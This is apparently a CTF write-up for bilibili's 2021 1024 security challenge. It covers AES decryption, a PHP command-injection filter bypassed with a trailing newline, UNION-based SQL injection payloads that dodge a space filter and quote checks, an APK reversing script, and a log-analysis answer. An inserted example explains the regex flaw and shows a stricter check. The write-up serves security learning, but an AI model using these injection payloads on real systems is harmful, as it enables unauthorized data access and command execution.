bilibili 2021 1024 programmer's day security attack and defense challenge

Title address: https://www.bilibili.com/blackboard/20211024.html

Topic 1

AES decryption, password: happy_1024_2233. The ciphertext is the bottom two lines of characters, which need to be joined into one line (I really didn't expect this at first!)

Online decryption website: http://tool.chacuo.net/cryptaes

Topic 2

Press F12 and find the hidden flag in home.vue

Topic 3

Download the compressed package and extract it to get eval.php

<?php
    /* 
        bilibili- ( ゜- ゜)つロ Cheers~
        uat: http://192.168.3.2/uat/eval.php
        pro: http://security.bilibili.com/sec1024/q/pro/eval.php
    */
    $args = @$_GET['args'];
    if (count($args) >3) {
        exit();
    }
    for ( $i=0; $i<count($args); $i++ ){
        if ( !preg_match('/^\w+$/', $args[$i]) ) {
            exit();
        }
    }
    // todo: other filter
    $cmd = "/bin/2233 " . implode(" ", $args);
    exec($cmd, $out);
    for ($i=0; $i<count($out); $i++){
        echo($out[$i]);
        echo('<br>');
    }
?>

The general idea is to pass a command in through the args parameter to find the flag. The args array is limited to 3 elements, and the regex /^\w+$/ filters out special characters such as /, ., and so on. The args are also appended after /bin/2233, so a command cannot be executed directly. This can be bypassed with a trailing newline (%0a) on an argument, after which the command is executed.

ls lists the files in the current directory

cat passwd gets the flag
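The newline bypass works because in PCRE (which PHP's preg_match uses) and in Python's re module, `$` also matches just before a final newline, so `/^\w+$/` accepts "ls\n". The following Python example is added here and is not part of the original write-up; it shows the weak check beside a strict one and a defensively built command line, with constructed sample arguments (in PHP the strict equivalent is `\z` or the D modifier, plus escapeshellarg()).

```python
import re
import shlex

# Constructed inputs mirroring the challenge: ordinary words should pass,
# a trailing newline is the bypass described above.
SAMPLE_ARGS = ["version", "ls\n", "a;b", "../etc"]


def weak_check(arg: str) -> bool:
    """The filter as written in eval.php: /^\w+$/.
    '$' also matches before a trailing newline, so 'ls\n' is accepted."""
    return re.match(r'^\w+$', arg) is not None


def strict_check(arg: str) -> bool:
    """Match the whole string; fullmatch() anchors at the true end,
    so a trailing newline is rejected."""
    return re.fullmatch(r'\w+', arg) is not None


def build_command(args, check=strict_check, max_args=3) -> str:
    """Rebuild the challenge's command line defensively: bounded argument
    count, strict per-argument check, and shell quoting of every argument
    so nothing in an argument can terminate or extend the command."""
    if len(args) > max_args:
        raise ValueError("too many arguments")
    for a in args:
        if not check(a):
            raise ValueError(f"rejected argument: {a!r}")
    return "/bin/2233 " + " ".join(shlex.quote(a) for a in args)


def rejects(args, check=strict_check) -> bool:
    """True if build_command refuses the given argument list."""
    try:
        build_command(args, check=check)
    except ValueError:
        return True
    return False


def compare_filters(args=SAMPLE_ARGS):
    """Return {arg: (weak_result, strict_result)} to make the gap visible."""
    return {a: (weak_check(a), strict_check(a)) for a in args}


if __name__ == "__main__":
    for arg, (weak, strict) in compare_filters().items():
        print(f"{arg!r:12} weak={weak} strict={strict}")
```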

Topic 4

The address is the same as topic 2, but at first I had no idea. Later I got the hint that it is SQL injection. Again, under F12 I found an API endpoint that takes some parameters for submitting log information via POST.

There is an injection point at user_name, and spaces are filtered.

Get the database name: q

{
    "user_id": "",
    "user_name": "1/**/union/**/select/**/1,2,3,4,database()",
    "action": "",
    "page": 1,
    "size": 20
}

Get the table names: flag, log, user

{
    "user_id": "",
    "user_name": "1/**/union/**/select/**/1,2,3,4,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()",
    "action": "",
    "page": 1,
    "size": 20
}

Get the column name: id (quotation marks cannot be used here, otherwise the string is closed early and causes an error; this can be bypassed with hexadecimal. The hex of flag is 666c6167, prefixed with 0x)

{
    "user_id": "",
    "user_name": "1/**/union/**/select/**/1,2,3,4,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666c6167",
    "action": "",
    "page": 1,
    "size": 20
}

The last step is to get the flag

{
    "user_id": "",
    "user_name": "1/**/union/**/select/**/1,2,3,4,group_concat(id)/**/from/**/flag",
    "action": "",
    "page": 1,
    "size": 20
}

Topic 5

Download test.apk; after entering an account name and password and submitting, it shows the prompt "a little ~ ~"

Does it give the flag when you input it correctly? I gradually forgot about this question. It tests reverse analysis~

Refer to other solutions below:

Open it with JADX

Encrypt is the encryption routine. For the two strings in MainActivity, just apply the reverse of encrypt once: one base64 decode, then one XOR with 3, and the two resulting strings combine into the flag

Problem-solving script

import base64

# The two byte arrays taken from MainActivity (ASCII codes of two base64 strings)
obyteArray = [0x59, 0x57, 0x42, 0x6c, 0x4f, 0x6d, 0x5a, 0x6e, 0x4e, 0x6a, 0x41, 0x75,
              0x4f, 0x6d, 0x4a, 0x6d, 0x4e, 0x7a, 0x41, 0x78, 0x4f, 0x32, 0x59, 0x3d]

code = [0x4e, 0x6a, 0x49, 0x31, 0x4f, 0x7a, 0x41, 0x33, 0x59, 0x47, 0x41, 0x75,
        0x4e, 0x6a, 0x4e, 0x6d, 0x4e, 0x7a, 0x63, 0x37, 0x59, 0x6d, 0x55, 0x3d]

# Turn the byte arrays back into the base64 text
user = ""
password = ""
for i in range(24):
    user += chr(obyteArray[i])
    password += chr(code[i])

print(base64.b64decode(user))
print(base64.b64decode(password))

# Reverse step 1: base64 decode (each gives 17 characters)
a1 = str(base64.b64decode(user), encoding="utf-8")
a2 = str(base64.b64decode(password), encoding="utf-8")

# Reverse step 2: XOR every character with 3
ans = ""
ans1 = ""
for i1 in range(17):
    p = ord(a1[i1]) ^ 3
    ans += chr(p)
    p1 = ord(a2[i1]) ^ 3
    ans1 += chr(p1)

print(ans)
print(ans1)

Topic 6

Refer to: https://www.52pojie.cn/thread-1532604-1-1.html

Topic 7

This is log analysis: you need to find all the malicious IP addresses. Part of the answer is as follows:

jj.bdc.bbb.cc,dc.bb.ii.jj,cde.ced.bbb.dd,cdd.bcc.bg.bib,cd.bb.cai.cbh,cd.baf.cae.cbc,bfh.ff.dj.jf,bfh.ff.dj.ig,bfh.ff.dj.fb,bfh.ff.dj.bd,bfh.ff.dj.bcf,bbb.bb.bjd.bhf,bbb.bb.bjd.bhc,bbb.bb.bjd.bha,bbb.bb.bjd.bgc,bba.ja.ccb.cbc,bba.ja.cca.beg

Tags: security CTF

Posted on Mon, 25 Oct 2021 10:57:29 -0400 by mark123